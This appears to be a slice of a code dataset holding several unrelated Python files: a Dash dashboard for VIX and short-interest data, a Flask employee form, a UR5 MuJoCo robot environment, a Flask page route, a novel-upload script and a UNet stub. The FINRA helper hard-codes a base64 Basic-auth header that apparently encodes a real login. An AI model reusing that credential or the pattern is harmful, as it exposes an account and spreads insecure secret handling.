df.at[1,'baa']\n c1 = df.at[0,'baa']\n\n p2 = df.at[3,'baa']\n c2 = df.at[2,'baa']\n\n T1 = df.at[1,'T']\n T2 = df.at[3,'T']\n\n k1 = df.at[1,'closest_strikes']\n k2 = df.at[3,'closest_strikes']\n\n F1 = k1 + (math.exp(r*T1) * (c1-p1))\n F2 = k2 + (math.exp(r*T2) * (c2-p2))\n\n ## Now we need to calc the variance\n df2 = input_df.copy()\n df2 = df2.loc[df2['expirationDateStr'].isin([start_exp, end_exp])].sort_values(by='strikePrice')\n # To get the delta X, forward and lag variables\n df2['lag_strike'] = df2.groupby(['expirationDateStr','putCall'])['strikePrice'].shift()\n df2['forward_strike'] = df2.groupby(['expirationDateStr','putCall'])['strikePrice'].shift(-1)\n\n df2['deltaX'] = abs(df2['forward_strike'] - df2['lag_strike']) / 2\n\n df2 = df2.sort_values(by=['expirationDateStr','putCall', 'strikePrice']).reset_index(drop=True)\n df2['deltaX'] = df2['deltaX'].interpolate(method='pad') # Fill NaNs at the edges with the nearest adjacent strike's spacing\n df2['deltaX'] = df2['deltaX'].bfill()\n\n # Make columns to help with the sum term; each expiry's contribution is discounted at its own rate\n df2['strikes_sq'] = df2['strikePrice'].apply(lambda x: x**2)\n df2['sth_base'] = (df2['deltaX'] / df2['strikes_sq']) * df2['Q']\n df2['sth1'] = df2['sth_base'] * math.exp(r * T1)\n df2['sth2'] = df2['sth_base'] * math.exp(r * T2)\n\n ndf = df2.loc[df2['expirationDateStr']==start_exp]\n fdf = df2.loc[df2['expirationDateStr']==end_exp]\n\n st1 = ndf['sth1'].sum()\n st2 = fdf['sth2'].sum()\n\n nt_k0 = ndf['closest_strikes'].values[0]\n ft_k0 = fdf['closest_strikes'].values[0]\n\n fterm1 = (((F1 / nt_k0) - 1 ) ** 2) * (1/T1)\n fterm2 = (((F2 / ft_k0) - 1 ) ** 2) * (1/T2)\n\n sterm1 = (2/T1) * st1\n sterm2 = (2/T2) * st2\n\n var1 = sterm1 - fterm1\n var2 = sterm2 - fterm2\n\n\n # Blend the near- and far-term variances into a single 30-day value\n N1 = df.at[0,'mte_calc']\n N2 = df.at[2, 'mte_calc']\n\n N30 = 43200 # Number of minutes in 30 days\n N365 = 525600 # Number of minutes in a year\n\n\n vix1 = (T1 * var1 * ( (N2-N30) / (N2-N1)))\n vix2 = (T2 * var2 * ( (N30-N1) / (N2-N1)))\n vix3 = (vix1 + vix2) * (N365/N30)\n\n VIX = 100 * (vix3**0.5)\n\n return VIX\n\ndef get_VIX(tda_api, neardate=None, fardate=None):\n\n if neardate==None:\n neardate = datetime.datetime.now() + datetime.timedelta(days=24)\n dow = neardate.weekday()\n while dow != 4:\n neardate = neardate + datetime.timedelta(days=1)\n dow = neardate.weekday()\n\n if fardate==None:\n if type(neardate)==str:\n neardate = datetime.datetime.strptime(neardate, '%Y-%m-%d')\n fardate = neardate + datetime.timedelta(days=7)\n\n neardate_str = str(neardate)[0:10]\n fardate_str = str(fardate)[0:10]\n\n df = tda_api.get_option_chain_df({'symbol':'$SPX.X', 
'fromDate':neardate_str,'toDate':fardate_str})\n\n # Make sure we only include weeklys and not the AM expirations\n df['spx_symbol'] = df['symbol'].apply(lambda x: x[0:4])\n df = df.loc[df['expirationDateStr'].isin([neardate_str, fardate_str])]\n df = df.loc[df['spx_symbol']=='SPXW']\n df = df.reset_index(drop=True)\n\n df2 = find_closest_midpoints(df)\n df3 = filter_bids(df2)\n df4 = calc_VIX(df3)\n\n return df4\n\ndef dash_vix_values(tda_api):\n\n\n neardate = datetime.datetime.now() + datetime.timedelta(days=24)\n dow = neardate.weekday()\n while dow != 4:\n neardate = neardate + datetime.timedelta(days=1)\n dow = neardate.weekday()\n\n if type(neardate)==str:\n neardate = datetime.datetime.strptime(neardate, '%Y-%m-%d')\n fardate = neardate + datetime.timedelta(days=7)\n\n neardate0 = neardate + datetime.timedelta(days=-7)\n fardate0 = fardate + datetime.timedelta(days=-7)\n\n neardate2 = neardate + datetime.timedelta(days=7)\n fardate2 = fardate + datetime.timedelta(days=7)\n\n neardate_str = str(neardate)[0:10]\n fardate_str = str(fardate)[0:10]\n\n neardate_str0 = str(neardate0)[0:10]\n fardate_str0 = str(fardate0)[0:10]\n\n neardate_str2 = str(neardate2)[0:10]\n fardate_str2 = str(fardate2)[0:10]\n\n vix0 = round(get_VIX(tda_api, neardate=neardate0, fardate=fardate0), 3)\n vix1 = round(get_VIX(tda_api, neardate=neardate, fardate=fardate), 3)\n vix2 = round(get_VIX(tda_api, neardate=neardate2, fardate=fardate2), 3)\n\n r0 = [neardate_str0, fardate_str0, vix0]\n r1 = [neardate_str, fardate_str, vix1]\n r2 = [neardate_str2, fardate_str2, vix2]\n\n rdict = [r0, r1, r2]\n\n return rdict\n\n\n################## END VIX CALC CODE ##################\n\n\n################## START VOLATILITY TERM-STRUCTURE CODE ##################\ndef pullCalendarIVdf(tda_api, sym, start_dt, end_dt, filter_fd=False):\n\n df = tda_api.get_option_chain_df({'symbol':sym, 'fromDate':start_dt,'toDate':end_dt, 'range':'OTM'})\n df['volatility'] = df['volatility'].apply(lambda x: pd.to_numeric(x, errors='coerce'))\n\n\n merge_cols = ['putCall', 'strikePrice', 'volatility','bid', 'ask','last',\n 'mark', 'delta', 'gamma', 'theta', 'vega', 'rho','expirationDateStr']\n\n df = df.dropna(subset=['volatility'])\n # df = df.loc[df['bid']>0]\n df = df.loc[df['bid']>0]\n # df = df.loc[df['openInterest']>0]\n # df = df.loc[df['totalVolume']>0]\n\n # Filter if required\n if (filter_fd == 'True') or (filter_fd==True):\n df = df.loc[df['expirationDateStr']>df['expirationDateStr'].min()].reset_index(drop=True)\n\n ## Initialize dataframe to merge on with first date\n first_dt = df['expirationDateStr'].unique()[0]\n mdf = df.loc[df['expirationDateStr']==first_dt][merge_cols]\n\n col_list1 = []\n for col in merge_cols:\n if col in ['putCall', 'strikePrice']:\n col_list1.append(col)\n else:\n colname1 = col+'_{}'.format(first_dt)\n col_list1.append(colname1)\n\n mdf.columns = col_list1\n\n\n for i in range(1, df['expirationDateStr'].nunique()):\n\n curr_date = df['expirationDateStr'].unique()[i]\n\n tempdf1 = df.loc[df['expirationDateStr']==curr_date][merge_cols]\n\n col_list1 = []\n for col in merge_cols:\n if col in ['putCall', 'strikePrice']:\n col_list1.append(col)\n else:\n colname1 = col+'_{}'.format(curr_date)\n col_list1.append(colname1)\n\n tempdf1.columns = col_list1\n\n mdf = mdf.merge(tempdf1, on=['putCall','strikePrice'], how='left')\n\n return mdf\n\ndef graphCalendarIV(sym, input_df, pc):\n\n mdf = input_df.copy()\n\n col_list = []\n cdict = {'CALL':'Greens', 'PUT':'Reds'}\n\n for col in list(mdf):\n if 'volatility' 
in col:\n col_list.append(col)\n\n fig = go.Figure()\n\n tpdf = mdf.copy()\n tpdf = tpdf.loc[tpdf['putCall']==pc]\n\n for col in col_list:\n tpdf[col] = tpdf[col].astype('float',errors='ignore')\n tpdf.dropna(subset=[col],inplace=True)\n\n dim_list = []\n grange = [tpdf[col_list].dropna().values.min(), tpdf[col_list].dropna().values.max()]\n\n for col in col_list:\n tdict = {'range':grange, 'label':col, 'values':tpdf[col]}\n dim_list.append(tdict)\n\n data=go.Parcoords(\n line = dict(color = tpdf['strikePrice'],\n colorscale = cdict[pc],\n cmax=tpdf['strikePrice'].max(),\n cmin=tpdf['strikePrice'].min(),\n showscale = True),\n dimensions = dim_list\n )\n fig.add_trace(data)\n\n fig.update_layout(title='Volatility Term Structure for {sym} {pc}'.format(sym=sym,pc=pc), title_y = 0.95, title_x=0.5, title_font_size=30)\n\n return {'data': fig.data,\n 'layout': fig.layout}\n################## END VOLATILITY TERM-STRUCTURE CODE ##################\n\n#### START short interest CODE ####\ndef parse_finra_df(input_r, num_cols=['shortParQuantity', 'shortExemptParQuantity', 'totalParQuantity']):\n\n dlist = input_r.text.split('\\n')\n\n dlist = [d.replace('\"','') for d in dlist]\n\n dlist2 = dlist[1:]\n dlist2 = [d.split(',') for d in dlist2]\n\n\n df = pd.DataFrame(data=dlist2,columns=dlist[0].split(','))\n\n for col in num_cols:\n df[col] = df[col].astype('int',errors='ignore').fillna(np.nan)\n df = df.dropna(subset=[col])\n df[col] = df[col].astype('int',errors='ignore').fillna(np.nan)\n\n return df\n\ndef pull_finra_dataset(group_name, dataset_name, body=None):\n\n headers = {'Authorization': 'Basic c2xhY2tlcjI5ODpXdGZjb3B0ZXIxOTgya2s='}\n base_finra_url = 'https://api.finra.org'\n data_req_str = base_finra_url+'/data/group/{group_name}/name/{dataset_name}'.format(group_name=group_name,dataset_name=dataset_name)\n\n r = requests.post(data_req_str,data=json.dumps(body), headers=headers)\n\n df = parse_finra_df(r)\n\n return df\n\ndef merge_price_and_finra(tda_api, finra_df, sym):\n\n ddf = get_historical_stock_data(tda_api, sym, finra_df['tradeReportDate'].min(), finra_df['tradeReportDate'].max(), frequencyType='daily')\n ddf['tradeReportDate'] = ddf['date'].apply(lambda x: str(x)[0:10])\n\n fdf2 = finra_df.groupby('tradeReportDate',as_index=False).sum()\n fdf3 = ddf.merge(fdf2, on='tradeReportDate')\n\n return fdf3\n\ndef fix_ndt_date(dt):\n\n dt2 = dt[-4:] + '-'+ dt[0:2] + '-' + dt[3:5]\n return dt2\n\ndef pull_nqt_si(curr_sym):\n\n body = {'method': \"BL_ShortInterest.SearchShortInterests\", 'params': [curr_sym], 'version': \"1.1\"}\n\n headers = {'Host': 'www.nasdaqtrader.com',\n 'Connection': 'keep-alive',\n 'Content-Length': '95',\n 'Content-type': 'application/json',\n 'Accept': '*/*',\n 'Origin': 'http://www.nasdaqtrader.com',\n 'Referer': 'http://www.nasdaqtrader.com/Trader.aspx?id=ShortInterest'}\n\n r = requests.post('http://www.nasdaqtrader.com/RPCHandler.axd', data=json.dumps(body),headers=headers)\n\n ## parse the RPC handler's raw text response\n ndt_colnames = ['Settlement Date',\t'Short Interest', 'Percent Change',\t'Average Daily Share Volume','Days to Cover']\n r2 = r.text\n r2 = r2.replace('\\r\\n\\t\\r\\n\\t\\r\\n\\t\\t',';').replace('\\r\\n\\t\\t',';')\n r3 = r2.split(';')\n\n r4 = [r3[0][-10:]] + r3[1:]\n\n # Fix the last entry, which has artifacts from the HTML response\n final_idx = r4[len(r4)-1].find('<')\n r4[len(r4)-1] = r4[len(r4)-1][0:final_idx]\n\n # reshape so we can put it in a 
dataframe\n rdata = np.array(r4).reshape(-1,5)\n ndt_df = pd.DataFrame(data=rdata, columns=ndt_colnames)\n ndt_df['tradeReportDate'] = ndt_df['Settlement Date'].apply(lambda x: fix_ndt_date(x))\n\n return ndt_df\n\ndef make_si_gdf(tda_api, curr_sym):\n\n df = pull_finra_dataset('OTCMarket', 'REGSHODAILY', body={\"compareFilters\": [ { \"compareType\": \"equal\", \"fieldName\": \"securitiesInformationProcessorSymbolIdentifier\", \"fieldValue\" : curr_sym}]})\n df2 = merge_price_and_finra(tda_api, df, curr_sym)\n\n try:\n ndt_df = pull_nqt_si(curr_sym)\n df3 = df2.merge(ndt_df, on='tradeReportDate',how='left')\n except:\n df3=df2\n\n return df3\n\ndef plot_short_candles(df):\n# https://plotly.com/python/candlestick-charts/\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n candles = go.Candlestick(x=df['date'],\n open=df['open'],\n high=df['high'],\n low=df['low'],\n close=df['close'],\n name=df.at[0,'symbol'])\n\n fig.add_trace(candles,secondary_y = False)\n\n bar_graph = go.Bar(\n x = df['date'],\n y = df['volume'],\n marker_color='blue',\n opacity=0.5,\n name='tda Volume',\n visible='legendonly'\n )\n fig.add_trace(bar_graph,secondary_y = True)\n\n bar_graph = go.Bar(\n x = df['date'],\n y = df['totalParQuantity'],\n marker_color='darkblue',\n opacity=0.5,\n name='finra Volume',\n visible='legendonly'\n )\n fig.add_trace(bar_graph,secondary_y = True)\n\n bar_graph = go.Bar(\n x = df['date'],\n y = df['shortParQuantity'],\n marker_color='orange',\n opacity=0.5,\n name='short Volume'\n )\n fig.add_trace(bar_graph,secondary_y = True)\n\n try: # Not all symbols have confirmed short data\n bar_graph = go.Bar(\n x = df['date'],\n y = df['Short Interest'],\n marker_color='red',\n opacity=0.8,\n name='confirmed short interest'\n )\n fig.add_trace(bar_graph,secondary_y = True)\n except:\n pass\n\n fig.update_layout(legend_orientation=\"h\", barmode='overlay', height=800)\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\n#### END short interest CODE ####\n\n\n\n\n# Get default day for the date picker\n\ncurr_unix = time.time()\ncurr_dt = ciso8601.parse_datetime(datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d'))\ndayofweek = curr_dt.weekday()\nwhile dayofweek != 4:\n curr_unix += 86400\n curr_dt = ciso8601.parse_datetime(datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d'))\n dayofweek = curr_dt.weekday()\n# print(dayofweek)\n\ndefault_date = datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d')\nmin_date = datetime.datetime.utcfromtimestamp(time.time()-86400)\n\nt1 = TDAmeritrade()\n\nall_symbols = pull_all_symbols(t1)\n\n################## DASH CODE ##################\n\n# external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__)#, external_stylesheets=external_stylesheets)\n\nserver = app.server\n\napp.layout = html.Div([\n\n html.H1(\n children=\"Lanier's Short Interest Dashboard\",\n style={\n 'textAlign': 'center'\n }\n ),\n\n html.Div([\n dcc.Markdown(d(\"\"\"\n Choose Symbol\n \"\"\")),\n dcc.Dropdown(\n id='symbol-dropdown',\n options=[{'label': s, 'value': s} for s in all_symbols],\n value='TSLA'\n ),\n ]),\n\n # html.Div([\n # dcc.Markdown(d(\"\"\"\n # Choose date range:\n # \"\"\")),\n # dcc.DatePickerRange(\n # id='date-picker',\n # min_date_allowed=date(1900, 1, 1),\n # max_date_allowed=date(2017, 9, 19),\n # initial_visible_month=date(2020, 1, 1),\n # end_date=date=datetime.datetime.now()\n # )\n # ],style={'width': '24%', 'display': 
'inline-block'}),\n\n html.Div([\n dcc.Graph(id='short-graph') ]),\n\n\n])\n\n\n# Need to just filter the DF to within the selected ranges, then run the get_graph_df\n# function to get the code necessary to create the graph. Pretty straightforward\n### CALLBACK CODE ###\n\n@app.callback(\n dash.dependencies.Output('short-graph', 'figure'),\n [dash.dependencies.Input('symbol-dropdown', \"value\")])\n # dash.dependencies.Input('date-picker', 'start_date'),\n # dash.dependencies.Input('date-picker', 'end_date')]])\ndef update_figure(sym): #, start_dt, end_dt):\n\n sdf = make_si_gdf(t1, sym)\n sgraph = plot_short_candles(sdf)\n return sgraph\n\n# @app.callback(\n# dash.dependencies.Output('dgx-graph', 'figure'),\n# [dash.dependencies.Input('dix-date', \"date\"),\n# dash.dependencies.Input('gex-rolling', \"value\")])\n# def update_dix(ddate, grolling):\n#\n# date1 = str(ddate)[0:10]\n#\n# dgraph = plot_dix(ddate, dix_rolling=grolling, gex_rolling=grolling)\n#\n# return dgraph\n#\n# @app.callback(\n# [dash.dependencies.Output('vix0', 'children'),\n# dash.dependencies.Output('vix1', 'children'),\n# dash.dependencies.Output('vix2', 'children')],\n# [dash.dependencies.Input('update-vix-button', \"n_clicks\")])\n# def update_vix(nclicks):\n#\n# vix_vals = dash_vix_values(t1)\n#\n# vix0_vals = vix_vals[0]\n# vix1_vals = vix_vals[1]\n# vix2_vals = vix_vals[2]\n#\n# v0 = 'Neardate: {nd} // Fardate: {fd} // VIX: {v}'.format(nd=vix0_vals[0], fd=vix0_vals[1], v=vix0_vals[2])\n# v1 = 'Neardate: {nd} // Fardate: {fd} // VIX: {v}'.format(nd=vix1_vals[0], fd=vix1_vals[1], v=vix1_vals[2])\n# v2 = 'Neardate: {nd} // Fardate: {fd} // VIX: {v}'.format(nd=vix2_vals[0], fd=vix2_vals[1], v=vix2_vals[2])\n#\n# return v0,v1,v2\n\n\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)#,host='0.0.0.0', port=9000)\n","sub_path":"ShortInterestDash/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":66157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"284998513","text":"from datetime import date\n\nfrom citywok_ms.fields import BlankCountryField, BlankSelectField\nfrom citywok_ms.models import Employee\nfrom citywok_ms.utils import ID, SEX\nfrom flask_wtf import FlaskForm\nfrom wtforms import HiddenField, StringField, SubmitField, TextAreaField\nfrom wtforms.fields.html5 import (DateField, DecimalField, EmailField,\n IntegerField, TelField)\nfrom wtforms.validators import (Email, InputRequired, NumberRange, Optional,\n ValidationError)\nfrom wtforms_alchemy import QuerySelectField\nfrom wtforms_alchemy.utils import choice_type_coerce_factory\nfrom wtforms_components import SelectField\n\n\nclass EmployeeForm(FlaskForm):\n \"\"\"\n Form to create or update Employee\n \"\"\"\n hide_id = HiddenField()\n first_name = StringField(label='First Name',\n validators=[InputRequired()])\n last_name = StringField(label='Last Name',\n validators=[InputRequired()])\n zh_name = StringField(label='Chinese Name',\n filters=[lambda x: x or None],\n validators=[Optional()])\n sex = BlankSelectField(label='Sex',\n choices=SEX,\n coerce=choice_type_coerce_factory(\n Employee.sex.type),\n message='---',\n validators=[InputRequired()])\n birthday = DateField(label='Birthday',\n validators=[Optional()])\n contact = TelField(label='Contact',\n validators=[Optional()],\n filters=[lambda x: x or None])\n email = EmailField(label='E-mail',\n validators=[Optional(),\n Email()],\n filters=[lambda x: x or None])\n id_type = BlankSelectField(label='ID Type',\n 
validators=[InputRequired()],\n choices=ID,\n coerce=choice_type_coerce_factory(\n Employee.id_type.type),\n message='---')\n id_number = StringField(label='ID Number',\n validators=[InputRequired()])\n id_validity = DateField(label='ID Validity',\n validators=[InputRequired()])\n nationality = BlankCountryField(label='Nationality',\n message='---',\n validators=[InputRequired()])\n nif = IntegerField(label='NIF',\n validators=[Optional()])\n niss = IntegerField(label='NISS',\n validators=[Optional()])\n employment_date = DateField(label='Employment Date',\n validators=[Optional()])\n total_salary = DecimalField(label='Total Salary',\n validators=[InputRequired(),\n NumberRange(min=0)])\n taxed_salary = DecimalField(label='Taxed Salary',\n validators=[InputRequired(),\n NumberRange(min=0)],\n default=635)\n\n remark = TextAreaField(label='Remark',\n validators=[Optional()],\n filters=[lambda x: x or None])\n\n submit = SubmitField(label='Add')\n update = SubmitField(label='Update')\n\n def validate_id_validity(self, id_validity):\n \"\"\"\n Validate the id_validity field, check if it's still valid\n \"\"\"\n if (self.id_validity.data and self.id_validity.data < date.today()):\n raise ValidationError('ID has expired')\n\n def validate_nif(self, nif):\n '''\n Validate the nif field, to avoid duplicate nif number\n '''\n e = Employee.query.filter_by(nif=nif.data).first()\n if nif.data and e and (e.id != self.hide_id.data):\n raise ValidationError('This NIF already exists')\n\n def validate_niss(self, niss):\n '''\n Validate the niss field, to avoid duplicate niss number\n '''\n e = Employee.query.filter_by(niss=niss.data).first()\n if niss.data and e and (e.id != self.hide_id.data):\n raise ValidationError('This NISS already exists')\n","sub_path":"citywok_ms/employee/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"146534921","text":"import numpy as np\nimport numpy\nimport mujoco_py\nimport json\nfrom gym.envs.robotics import rotations, robot_env, utils\nimport os\n\n\ndef goal_distance(goal_a, goal_b):\n assert goal_a.shape == goal_b.shape\n return np.linalg.norm(goal_a - goal_b, axis=-1)\n\n\nclass Ur5Env(robot_env.RobotEnv):\n \"\"\"Superclass for all Ur5 environments.\n \"\"\"\n\n def __init__(\n self, model_path, n_substeps, distance_threshold, initial_qpos, reward_type, ctrl_type=\"joint\"\n ):\n \"\"\"Initializes a new UR5 environment.\n\n Args:\n model_path (string): path to the environments XML file\n n_substeps (int): number of substeps the simulation runs on every call to step\n distance_threshold (float): the threshold after which a goal is considered achieved\n initial_qpos (array): an array of values that define the initial configuration\n reward_type ('sparse' or 'dense'): the reward type, i.e. 
sparse or dense\n \"\"\"\n self.distance_threshold = distance_threshold\n self.reward_type = reward_type\n self.ctrl_type = ctrl_type\n\n super(Ur5Env, self).__init__(\n model_path=model_path, n_substeps=n_substeps, n_actions=6,\n initial_qpos=initial_qpos)\n\n # GoalEnv methods\n # ----------------------------\n\n def compute_reward(self, achieved_goal, goal, info):\n # Compute distance between goal and the achieved goal.\n d = goal_distance(achieved_goal, goal)\n if self.reward_type == 'sparse':\n return -(d > self.distance_threshold).astype(np.float32)\n else:\n return -d\n\n # RobotEnv methods\n # ----------------------------\n\n def _step_callback(self):\n a = 0\n # not implemented\n def set_state(self, qpos):\n old_state = self.sim.get_state()\n new_state = mujoco_py.MjSimState(old_state.time, qpos, old_state.qvel,\n old_state.act, old_state.udd_state)\n self.sim.set_state(new_state)\n self.sim.forward()\n\n def _set_action(self, action):\n assert action.shape == (6,)\n action = action.copy() # ensure that we don't change the action outside of this scope\n\n if self.ctrl_type == \"joint\":\n action *= 0.05 # limit maximum change in position\n # Apply action to simulation.\n utils.ctrl_set_action(self.sim, action)\n elif self.ctrl_type == \"cartesian\":\n dx = action.reshape(6, 1)\n jacp = self.sim.data.get_body_jacp(name=\"gripper_dummy_heg\").reshape(3, 6)\n jacr = self.sim.data.get_body_jacr(name=\"gripper_dummy_heg\").reshape(3, 6)\n jac = numpy.vstack((jacp, jacr))\n dq = 0.00001*numpy.linalg.lstsq(jac, dx)[0].reshape(6, )\n # print(sum(abs(sim.data.qpos-sim.data.ctrl)))\n utils.ctrl_set_action(self.sim, dq)\n\n def _get_obs(self):\n # positions\n force = self.sim.data.sensordata\n x_pos = self.sim.data.get_body_xpos(\"gripper_dummy_heg\")\n x_quat = self.sim.data.get_body_xquat(\"gripper_dummy_heg\")\n q_pos = self.sim.data.qpos\n\n obs = np.concatenate([\n x_pos, x_quat, q_pos, force\n ])\n\n return {\n 'observation': obs.copy(),\n 'achieved_goal': np.concatenate([x_pos, x_quat]).copy(),\n 'desired_goal': self.goal.copy(),\n }\n\n def _viewer_setup(self):\n body_id = self.sim.model.body_name2id('body_link')\n lookat = self.sim.data.body_xpos[body_id]\n for idx, value in enumerate(lookat):\n self.viewer.cam.lookat[idx] = value\n self.viewer.cam.distance = 2.5\n self.viewer.cam.azimuth = 132.\n self.viewer.cam.elevation = -14.\n\n def _render_callback(self):\n # Visualize target.\n a=0\n\n def _reset_sim(self):\n qpos = np.array([1.5708, 0, -1.5708, 1.5708, 1.5708, 1.5708])\n self.sim.data.ctrl[:] = qpos\n self.set_state(qpos)\n self.sim.forward()\n return True\n\n def _sample_goal(self):\n home_path = os.getenv(\"HOME\")\n goal_path = os.path.join(*[home_path, \"DRL_SetBot-RearVentilation\", \"experiment_configs\", \"goal.json\"])\n\n with open(goal_path, encoding='utf-8') as file:\n goal = json.load(file)\n return numpy.concatenate([goal['xpos'], goal['xquat']]).copy()\n\n def _is_success(self, achieved_goal, desired_goal):\n d = goal_distance(achieved_goal, desired_goal)\n print((d < self.distance_threshold).astype(np.float32))\n return (d < self.distance_threshold).astype(np.float32)\n\n def _env_setup(self, initial_qpos):\n qpos = np.array([1.5708, 0, -1.5708, 1.5708, 1.5708, 1.5708])\n self.sim.data.ctrl[:] = qpos\n self.set_state(qpos)\n self.sim.forward()\n\n\n def render(self, mode='human', width=500, height=500):\n return super(Ur5Env, self).render(mode, width, 
height)\n","sub_path":"gym/envs/robotics/ur5_env.py","file_name":"ur5_env.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"389785174","text":"#!/usr/bin/python3\n\"\"\"Simple Flask app, with additional route\"\"\"\nfrom flask import Flask, abort, render_template\nfrom models import storage\nfrom models.state import State\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom uuid import uuid4\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\n\n\n# begins rendering\n@app.route('/3-hbnb')\ndef filters():\n \"\"\"load filters\"\"\"\n cache_id = uuid4()\n states = storage.all(State).values()\n amenities = storage.all(Amenity).values()\n places = storage.all(Place).values()\n return render_template('3-hbnb.html',\n states=states,\n amenities=amenities,\n places=places,\n cache_id=cache_id)\n\n\n@app.teardown_appcontext\ndef do_teardown(self):\n \"\"\"Closes session\"\"\"\n storage.close()\n\n\nif __name__ == '__main__':\n \"\"\"Main Flask App\"\"\"\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_dynamic/3-hbnb.py","file_name":"3-hbnb.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"405874008","text":"\"\"\"save novel content into anyview website\r\n\"\"\"\r\nimport time\r\nfrom os import path, remove\r\n\r\nimport requests\r\nfrom robobrowser import RoboBrowser, forms\r\n\r\nfrom loguru import logger\r\nfrom util import config\r\n\r\nbase_path = path.split(path.realpath(__file__))[0]\r\nRequestsFail = 'requests failed: {url}\\nconnetion error: {err}'\r\n\r\ndef login(username, password, url):\r\n browser = RoboBrowser(parser='html.parser', history=True,\r\n timeout=30, tries=5, multiplier=0.3)\r\n\r\n try:\r\n browser.open(url)\r\n except requests.ConnectionError as e:\r\n logger.error(RequestsFail, url=url, err=e)\r\n return None\r\n except:\r\n logger.error('request failed: {url}', url=url)\r\n logger.exception('detail')\r\n return None\r\n\r\n # login\r\n login_form = browser.get_form(id='log-in')\r\n login_form['account'].value = username\r\n login_form['password'].value = password\r\n browser.submit_form(login_form)\r\n # access account\r\n account = browser.find(href='/account')\r\n if account is None:\r\n logger.info(\"page detail is: \\n{}\", browser.find())\r\n return None\r\n try:\r\n browser.follow_link(account)\r\n except requests.ConnectionError as e:\r\n logger.error(RequestsFail, url=browser.url, err=e)\r\n return None\r\n except:\r\n logger.error('request failed: {url}', url=browser.url)\r\n logger.exception('detail')\r\n return None\r\n\r\n return browser\r\n\r\n\r\ndef upload(novel_info, content):\r\n # get apan config\r\n username = config.get('apan', 'User')\r\n password = config.get('apan', 'Pass')\r\n apan_url = config.get('apan', 'Url')\r\n # login\r\n browser = login(username, password, apan_url)\r\n if browser is None:\r\n logger.error(\"login apan failed\")\r\n time.sleep(10)\r\n return False\r\n # delete\r\n browser = delete(browser, novel_info['title'])\r\n if browser is None:\r\n logger.error(\"delete novel failed\")\r\n time.sleep(10)\r\n return False\r\n upload_form = browser.get_forms()[0]\r\n # add upload action field\r\n upload_action_str = ''\r\n upload_action = forms.fields.Input(upload_action_str)\r\n upload_form.add_field(upload_action)\r\n # add upload file field\r\n pth = path.join(base_path, 'novels', 
novel_info['title'] + '.txt')\r\n # submit upload form\r\n try:\r\n with open(pth, 'w', encoding='utf-8') as f:\r\n f.write(file_content(novel_info, content))\r\n except (OSError, IOError) as e:\r\n logger.error('write file error: {}', e)\r\n return False\r\n except:\r\n logger.exception('detail')\r\n return False\r\n try:\r\n with open(pth, 'r', encoding='utf-8') as f:\r\n upload_form['file_to_upload'].value = f\r\n browser.submit_form(upload_form)\r\n except requests.ConnectionError as e:\r\n logger.error(RequestsFail, url=browser.url, err=e)\r\n return False\r\n except (OSError, IOError) as e:\r\n logger.error('read file error: {}', e)\r\n return False\r\n except:\r\n logger.exception(\"detail\")\r\n return False\r\n # delete temp file\r\n write_in_local = config.getboolean('app', 'WriteInLocal')\r\n if not write_in_local and path.exists(pth):\r\n remove(pth)\r\n\r\n return True\r\n\r\n\r\ndef delete(browser, title):\r\n form = browser.get_forms()[1]\r\n # find old file and delete it\r\n table = browser.find(class_='table table-bordered table-striped')\r\n if table is None:\r\n logger.info(\"page detail is: \\n{}\", browser.find())\r\n return None\r\n for tr in table.tbody.find_all('tr'):\r\n if title == tr.find('td', class_=\"item-title\").string[1:-4]:\r\n button = tr.find('button')\r\n nid = button['value']\r\n delete_button_str = str(button)\r\n delete_action = forms.fields.Input(delete_button_str)\r\n form.add_field(delete_action)\r\n form['file_id'].value = nid\r\n try:\r\n browser.submit_form(form)\r\n return browser\r\n except requests.ConnectionError as e:\r\n logger.error(RequestsFail, url=browser.url, err=e)\r\n return None\r\n except:\r\n logger.error('request failed: {url}', url=browser.url)\r\n logger.exception(\"detail\")\r\n return None\r\n\r\n return browser\r\n\r\n\r\ndef file_content(novel_info, content):\r\n return '\\n'.join([\r\n '标题:' + novel_info['title'],\r\n '作者:' + novel_info['author'],\r\n '类型:' + novel_info['type'],\r\n '日期:' + novel_info['date'],\r\n content\r\n ])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ni = {\r\n 'id': 123,\r\n 'title': '测试文件',\r\n 'author': '大西瓜',\r\n 'date': '2019-3-6',\r\n 'type': '其他',\r\n 'link': 'http://www.example.com'\r\n }\r\n content = '这是一个新的abc测试文件。\\n'\r\n upload(ni, content)\r\n","sub_path":"pipline/apan.py","file_name":"apan.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313762376","text":"import torch\r\nimport torchaudio\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport os\r\nimport time\r\n\r\n#declare a network (unet)\r\ndef conv3x3(in_channels, out_channels, stride=1,\r\n padding=1, bias=True, groups=1):\r\n return nn.Conv2d(\r\n in_channels,\r\n out_channels,\r\n kernel_size=3,\r\n stride=stride,\r\n padding=padding,\r\n bias=bias,\r\n groups=groups)\r\n\r\ndef upconv2x2(in_channels, out_channels, mode='transpose'):\r\n if mode == 'transpose':\r\n return nn.ConvTranspose2d(\r\n in_channels,\r\n out_channels,\r\n kernel_size=2,\r\n stride=2)\r\n 